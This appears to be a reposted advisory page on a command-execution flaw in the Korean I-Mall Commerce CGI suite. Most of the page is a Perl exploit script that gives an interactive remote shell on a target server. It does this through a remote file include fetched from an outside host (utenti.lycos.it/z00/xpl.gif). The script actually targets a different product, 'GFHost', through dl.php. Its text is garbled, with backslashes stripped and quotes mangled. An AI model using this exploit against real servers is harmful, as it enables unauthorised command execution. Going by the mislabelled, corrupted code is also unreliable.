‘I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)’

Summary

‘I-Mall Commerce is ‘a CGI based online shopping suite in Korean language’. A remote command execution vulnerability has been discovered in the I-Mall CGI Application by ZetaLabs, Zone-H Laboratories. The following exploit code can be used to test your system for them mentioned vulnerability. This issue occurs due to insufficient filtering of externally supplied data to the i-mall.cgi script that allows a remote user to pass an arbitrary shell command which will be executed by the script. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.’

Credit:

‘The information has been provided by Jerome ATHIAS .
The original article can be found at: http://www.zone-h.org/advisories/read/id=4904


Details

Exploit:
##############################################
# GFHost explo
# Spawn bash style Shell with webserver uid
# Greetz SPAX, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = ‘/dl.php?a=0.1&OUR_FILE=ff24404eeac528b’. ‘&f=http://utenti.lycos.it/z00/xpl.gif&cmd=’;
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 1;
};
sub host {
print ‘nHost or IP : ‘;
$host=<STDIN>;
chomp $host;
if ($host eq ”){$host=’127.0.0.1’};
print ‘nPort (enter to accept 80): ‘;
$port=<STDIN>;
chomp $port;
if ($port =~/D/ ){$port=’80’};
if ($port eq ” ) {$port = ’80’};
};
sub server {
my $X;
print ‘nnnnnnnnnnnnnnnnnnnnnnnn’;
$probe = ‘string’;
my $output;
my $webserver = ‘something’;
&connect;
for ($X=0; $X<=10; $X++){
 $output = $results[$X];
 if (defined $output){
 if ($output =~/apache/){ $webserver = ‘apache’ };
 };
};
if ($webserver ne ‘apache’){
my $choice = ‘y’;
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print ‘nnOK’;
 };
};
sub scan {
my $status = ‘not_vulnerable’;
print ‘nnnnnnnnnnnnnnnnnnnnnnnn’;
my $loop;
my $output;
my $flag;
$command=’dir’;
for ($loop=1; $loop < @U; $loop++) {
$flag = ‘0’;
$url = $U[$loop];
$probe = ‘scan’;
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = ‘1’;
         $status = ‘vulnerable’;
         };
 };
if ($flag eq ‘0’) {
}else{
     };
};
if ($status eq ‘not_vulnerable’){

    };
};
sub choose {

my $choice=’1′;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print ‘[$host]$ ‘;
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/s/+/g;
$probe = ‘command’;
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
    Proto => ‘tcp’,
    PeerAddr => ‘$host’,
    PeerPort => ‘$port’,
    ) or die ‘nSorry UNABLE TO CONNECT To $host On Port $port.n’;
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection ‘GET $url$command HTTP/1.1rnHost: $hostrnrn’;
}elsif ($probe =~/string/) {
print $connection ‘HEAD / HTTP/1.1rnHost: $hostrnrn’;
};

while ( <$connection> ) {
   @results = <$connection>;
    };
close $connection;
if ($probe eq ‘command’){ &output };
if ($probe eq ‘string’){ &output };
};
sub output{
my $display;
if ($probe eq ‘string’) {
   my $X;
   for ($X=0; $X<=10; $X++) {
   $display = $results[$X];
   if (defined $display){print ‘$display’;};
    };
   }else{
   foreach $display (@results){
       print ‘$display’;
    };
                          };
};
sub exit{
print ‘nnn ORP’;
exit;
};
sub help {
print ‘nnnnnnnnnnnnnnnnnnnnnnnn’;
print ‘n
        GFHost PHP GMail
        Command Execution Vulnerability by SPABAM 2004’ ;
print ‘n http://www.zone-h.org/advisories/read/id=4904
‘;
print ‘n GFHost.pl Exploit v1.1’;
print ‘n n note.. Script under DEVEL’;
print ‘n’;
print ‘n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)’;
print ‘n Command: SCAN URL HELP QUIT’;
print ‘nnnnnnnnnnn’;
};’

Categories: Exploits